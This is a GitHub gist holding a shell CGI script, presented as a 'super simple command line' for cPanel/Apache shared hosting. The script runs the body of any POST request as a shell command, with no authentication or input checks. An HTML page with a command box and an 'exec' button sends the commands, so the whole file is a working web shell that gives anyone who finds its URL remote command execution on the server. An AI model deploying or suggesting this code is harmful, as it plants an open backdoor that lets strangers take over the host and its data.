Skip to content

Instantly share code, notes, and snippets.

@ariankordi

ariankordi/sh-cgi-term.cgi

Last active February 6, 2019 02:15
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ariankordi/c46ccff01168ae257d4359fc22c0d491 to your computer and use it in GitHub Desktop.
Save ariankordi/c46ccff01168ae257d4359fc22c0d491 to your computer and use it in GitHub Desktop.
Download ZIP
A super simple command line in shell CGI, this is useful for executing commands on a cPanel/Apache shared hosting account LOL
Raw
sh-cgi-term.cgi
#!/bin/sh
if [ $REQUEST_METHOD = "POST" ]; then
echo
$(cat) 2>&1
exit
fi
printf "Content-type: text/html\n\n"
#echo
cat << EOF
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<link rel="icon" href="data:;base64,iVBORw0KGgo=">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
button {
display: block;
font-size: 28px;
margin-bottom: 10px;
margin-top: 10px;
}
textarea {
display: block;
width: 800px;
height: 300px;
}
input {
width: 800px;
margin-top: 10px;
}
#error {
white-space: pre-wrap;
word-wrap: break-word;
color: red;
}
#success {
color: green;
}
@media screen and (max-width: 800px) {
button {
font-size: 14px;
margin-bottom: 5px;
}
textarea {
width: 98.5%;
}
input {
width: 98.5%;
}
}
</style>
<title>hacks XDXDXDDSXREXERFXDDXFR</title>
</head>
<body>
<div id="error" style="display: none;"></div>
<div id="success" style="display: none;"></div>
<textarea disabled></textarea>
<form>
<input placeholder="input" type="text">
<button>exec</button>
</form>
<script>
// @license magnet:?xt=urn:btih:e95b018ef3580986a04669f1b5879592219e2a7a&dn=public-domain.txt
// variables for all of the elements that are going to be edited soon
var textarea = document.getElementsByTagName('textarea')[0],
input = document.getElementsByTagName('input')[0],
form = document.getElementsByTagName('form')[0],
button = document.getElementsByTagName('button')[0],
error = document.getElementById('error'),
success = document.getElementById('success'),
// xhr
req = new XMLHttpRequest();
// execute the command, when the form is submitted
form.addEventListener('submit', event => {
event.preventDefault();
// un-disable the button, hide error and success
button.setAttribute('disabled', '');
error.setAttribute('style', 'display: none;');
success.setAttribute('style', 'display: none;');
// ask the user to enter a command please
if(input.value === '') {
button.removeAttribute('disabled');
error.textContent = 'enter a command';
error.removeAttribute('style');
return;
}
textarea.textContent = '';
// reset xhr and textarea (above)
req.open('POST', '');
// when the xhr is finished
req.addEventListener('load', () => {
// un-disable the button
button.removeAttribute('disabled');
if(req.status !== 200) {
// if there's an error, set error text and un-hide it
error.textContent = 'error posting ' + req.responseURL + ': ' + req.status + ' ' + req.statusText;
error.removeAttribute('style');
return;
} else {
// add response to the textarea
textarea.textContent = req.response;
// scroll textarea to the bottom
textarea.scrollTop = textarea.scrollHeight;
// tell the user it finished executing
success.textContent = 'finished executing';
success.removeAttribute('style');
}
});
// all of the event listeners have been assigned, so now send the xhr
// with the contents of input as the post data
req.send(input.value);
});
// @license-end
</script>
</body>
</html>
EOF
#printenv
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment